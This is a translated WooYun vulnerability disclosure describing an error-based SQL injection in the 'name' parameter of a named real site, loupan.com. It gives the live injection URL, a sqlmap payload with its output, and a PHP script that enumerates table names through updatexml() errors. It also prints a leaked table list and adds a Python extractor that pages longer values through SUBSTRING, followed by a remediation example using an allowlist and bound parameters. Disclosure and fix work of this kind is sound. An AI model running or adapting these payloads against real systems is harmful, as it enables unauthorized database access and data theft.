
Vulnerability summary

Defect ID: wooyun-2015-0106520

Title: SQL injection in the home furnishing and building materials channel of Loupan.com (with verification script)

Vendor: loupan.com

Author: Pany自留地

Submitted: 2015-04-08 09:36

Fixed: 2015-05-23 10:28

Published: 2015-05-23 10:28

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-08: details sent to the vendor, awaiting vendor response
2015-04-08: vendor confirmed; details disclosed to the vendor only
2015-04-18: details disclosed to core white hats and experts in the relevant field
2015-04-28: details disclosed to regular white hats
2015-05-08: details disclosed to intern white hats
2015-05-23: details disclosed to the public

Brief description:

Error-based SQL injection; sensitive data can be retrieved.

Details:

Injection point (the `name` parameter is used as a table name, so a trailing WHERE clause is accepted):

http://jiaju.loupan.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2


---
Parameter: name (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 9965 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (CASE WHEN (9965=9965) THEN 1 ELSE 0 END)),0x7162627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xClc
---
[09:08:20] [INFO] retrieved: 5.1.63-log
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
banner: '5.1.63-log'
[09:08:20] [INFO] retrieved: jiaju_loupan@localhost
current user: 'jiaju_loupan@localhost'
[09:08:20] [INFO] retrieved: jiaju_loupan
current database: 'jiaju_loupan'
current user is DBA: False


Verification script:
Retrieving table names (one table name per request via updatexml(); the page echoes the MySQL error, which carries the selected value after the 0x7e marker):

<?php
// Error-based extraction: updatexml() with a non-XPath second argument makes MySQL
// raise "XPATH syntax error: '~<value>'", and the page prints that error, leaking
// one table name (LIMIT $num,1 over information_schema.tables) per request.
for ($num = 0; $num <= 100; $num++) {
    $sql_url = "http://jiaju.loupan.com/batch.common.php/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=1%20and%201=(updatexml(0,concat(0x7e,(SELECT%20concat(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%20limit%20{$num},1)),0))--%20-";
    $result1 = file_get_contents($sql_url);
    // The leaked value sits between the 0x7e ('~') marker and the quote closing the error text.
    if ($result1 === false || !preg_match('/~(.*?)\'/', $result1, $result)) {
        // No error text in the response: the LIMIT offset is past the last table, stop.
        break;
    }
    echo $result[1] . "\r\n";
    ob_flush();
    flush();
}
?>
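How the updatexml() leak works, as an added example that is not part of the original report and not the author's script: the payload builder and the regex below rely on the same "XPATH syntax error" message the PHP script above parses. Going beyond the page, it also handles values longer than what fits in that message: MySQL keeps only the first 32 characters of the offending XPath expression, so after the '~' marker a single request leaks at most 31 characters, and longer values are paged with SUBSTRING(). `fake_endpoint` and `SAMPLE_TABLES` are constructed stand-ins for the vulnerable endpoint so the code runs offline; the error text format is assumed from MySQL 5.1 behaviour, and all function names here are this example's own.

```python
import re
from typing import Callable, List, Optional

# MySQL truncates the offending XPath expression in "XPATH syntax error" to 32
# characters; the '~' marker takes one, so each request leaks at most 31.
XPATH_ERR_LIMIT = 32
CHUNK = XPATH_ERR_LIMIT - 1

# The 0x7e ('~') marker is prepended by the payload so the leaked value can be
# located reliably inside whatever HTML surrounds the echoed MySQL error.
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def table_name_query(index: int) -> str:
    """Subquery selecting the index-th table name of the current database."""
    return ("select table_name from information_schema.tables "
            f"where table_schema=database() limit {index},1")


def build_payload(subquery: str, offset: int = 1) -> str:
    """Value of the injected `name` parameter for one request.

    'spacecomments where 1=1' is the table-name fragment from the report;
    updatexml() with a non-XPath second argument raises the error that carries
    CHUNK characters of the subquery result starting at `offset` (1-based).
    """
    leak = f"substring(({subquery}),{offset},{CHUNK})"
    return f"spacecomments where 1=1 and 1=(updatexml(0,concat(0x7e,{leak}),0))-- -"


def parse_leak(body: str) -> Optional[str]:
    """Leaked chunk from a response body, or None when no error was raised."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def extract_value(subquery: str, fetch: Callable[[str], str]) -> Optional[str]:
    """Reassemble a full value by paging through CHUNK-sized slices.

    `fetch` sends one request with the given `name` value and returns the body.
    Returns None when the subquery yields NULL (concat() with NULL is NULL and
    updatexml() then raises no error at all).
    """
    value, offset = "", 1
    while True:
        chunk = parse_leak(fetch(build_payload(subquery, offset)))
        if chunk is None:
            return None if offset == 1 else value
        value += chunk
        if len(chunk) < CHUNK:
            return value
        offset += CHUNK


def dump_tables(fetch: Callable[[str], str], limit: int = 100) -> List[str]:
    """Enumerate table names like the PHP script, stopping at the first NULL row."""
    tables: List[str] = []
    for i in range(limit):
        name = extract_value(table_name_query(i), fetch)
        if name is None:
            break
        tables.append(name)
    return tables


# --- constructed stand-in for the vulnerable endpoint (offline only) ----------
# Emulates how MySQL evaluates the injected expression: LIMIT picks a row,
# SUBSTRING(value, offset, width) slices it, and updatexml() fails with the
# '~'-prefixed slice in its error text.  A row past the end is NULL: no error.
SAMPLE_TABLES = [                      # constructed sample data
    "ecm_acategory",
    "ecm_goods_statistics",
    "members_with_a_deliberately_long_name_for_paging",   # 48 chars: two requests
]


def fake_endpoint(tables: List[str]) -> Callable[[str], str]:
    spec = re.compile(r"limit (\d+),1\),(\d+),(\d+)\)")

    def fetch(name_param: str) -> str:
        index, offset, width = (int(g) for g in spec.search(name_param).groups())
        if index >= len(tables):
            return "<html>no error, page rendered normally</html>"
        chunk = tables[index][offset - 1:offset - 1 + width]
        return f"<b>MySQL error</b>: XPATH syntax error: '~{chunk}'"

    return fetch


if __name__ == "__main__":
    for t in dump_tables(fake_endpoint(SAMPLE_TABLES)):
        print(t)
```

Run directly, it prints the three constructed table names; the third is reassembled from two requests. Against a real target, `fetch` would be the function that URL-encodes the returned string into the `name` parameter and returns the response body, exactly what `file_get_contents` does in the PHP script.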


Proof of vulnerability:

Table names:

ecm_acategory
ecm_address
ecm_article
ecm_attribute
ecm_brand
ecm_cart
ecm_category_goods
ecm_category_store
ecm_collect
ecm_coupon
ecm_coupon_sn
ecm_friend
ecm_function
ecm_gcategory
ecm_goods
ecm_goods_attr
ecm_goods_image
ecm_goods_qa
ecm_goods_spec
ecm_goods_statistics
ecm_groupbuy
ecm_groupbuy_log
ecm_mail_queue
ecm_member
ecm_message
ecm_module
ecm_navigation
ecm_order
ecm_order_extm
ecm_order_goods
ecm_order_log
ecm_pageview
ecm_partner
ecm_payment
ecm_privilege
ecm_recommend
ecm_recommended_goods
ecm_region
ecm_scategory
ecm_sessions
ecm_sessions_data
ecm_sgrade
ecm_shipping
ecm_store
ecm_uploaded_file
ecm_user_coupon
ecm_user_priv
[Table]adminsession
[Table]ads
[Table]announcements
[Table]attachments
[Table]attachmenttypes
[Table]blocks
[Table]cache
[Table]cache_0
[Table]cache_1
[Table]cache_2
[Table]cache_3
[Table]cache_4
[Table]cache_5
[Table]cache_6
[Table]cache_7
[Table]cache_8
[Table]cache_9
[Table]cache_a
[Table]cache_b
[Table]cache_c
[Table]cache_d
[Table]cache_e
[Table]cache_f
[Table]categories
[Table]channels
[Table]cities
[Table]click
[Table]clickgroup
[Table]clickuser
[Table]creditlog
[Table]creditrule
[Table]crons
[Table]customfields
[Table]forums
[Table]friendlinks
[Table]members
[Table]modelcolumns
[Table]modelfolders
[Table]modelinterval
[Table]models
[Table]pages
[Table]polls
[Table]postitems
[Table]postlog
[Table]postmessages
[Table]postset
[Table]prefields
[Table]reports
[Table]robotitems
[Table]robotlog
[Table]robotmessages
[Table]robots
[Table]rss
[Table]settings


Fix recommendation:
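The report leaves the fix section empty. What follows is an added example, not from the report and not the loupan.com code base: the vulnerable pattern the payload implies (the `name` parameter is spliced into the FROM clause and the rest of the statement is commented out by `-- -`) next to a hardened handler. A table name cannot be bound as a query parameter, so the fix is an allowlist that maps public model names to real tables, with `cid` validated and bound as an integer parameter. The schema and the in-memory sqlite3 database are constructed stand-ins for the MySQL tables, and `modelquote_vulnerable`, `modelquote_fixed` and `MODEL_TABLES` are hypothetical names.

```python
import re
import sqlite3
from typing import List, Tuple

# Constructed schema: a model table like 'spacecomments' and an unrelated
# sensitive table, so both query builders can be exercised offline.
SCHEMA = """
create table spacecomments (id integer, cid integer, body text);
create table members (id integer, username text, password text);
insert into spacecomments values (1, 1, 'nice kitchen'), (2, 2, 'bad tiles');
insert into members values (1, 'admin', 'hash-of-secret');
"""


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- vulnerable: request parameters are pasted into the SQL text --------------
def modelquote_vulnerable(conn: sqlite3.Connection, cid: str, name: str) -> List[Tuple]:
    # Whatever follows the table name in `name` becomes SQL; '-- -' in the
    # payload comments out the rest of the statement.
    sql = f"select * from {name} where cid={cid}"
    return conn.execute(sql).fetchall()


# --- hardened: identifier allowlist + bound parameter -------------------------
# Only public model names listed here may be queried; the real table name is
# taken from this map, never from the request.
MODEL_TABLES = {"spacecomments": "spacecomments"}


def modelquote_fixed(conn: sqlite3.Connection, cid: str, name: str) -> List[Tuple]:
    table = MODEL_TABLES.get(name)
    if table is None:
        raise ValueError(f"unknown model: {name!r}")
    if not re.fullmatch(r"\d+", cid):
        raise ValueError("cid must be an integer")
    # The identifier comes from the allowlist; the value is a bound parameter.
    sql = f"select * from {table} where cid=?"
    return conn.execute(sql, (int(cid),)).fetchall()


def rejects(conn: sqlite3.Connection, cid: str, name: str) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        modelquote_fixed(conn, cid, name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    # The report's probe: the attacker owns the WHERE clause.
    print(modelquote_vulnerable(db, "1", "spacecomments where 1=2 -- -"))
    # Reading an unrelated table through the same parameter.
    print(modelquote_vulnerable(db, "1", "members -- -"))
    print(modelquote_fixed(db, "1", "spacecomments"))
    print(rejects(db, "1", "members -- -"))
```

sqlite3 stands in for MySQL here only to make the two handlers runnable; the allowlist-plus-bound-parameter shape is the same with mysqli or PDO prepared statements on the PHP side.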

Copyright notice: when reposting, credit the source: Pany自留地@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed at: 2015-04-08 10:27

Vendor reply:

Thank you for your attention to our website.

Latest status:

None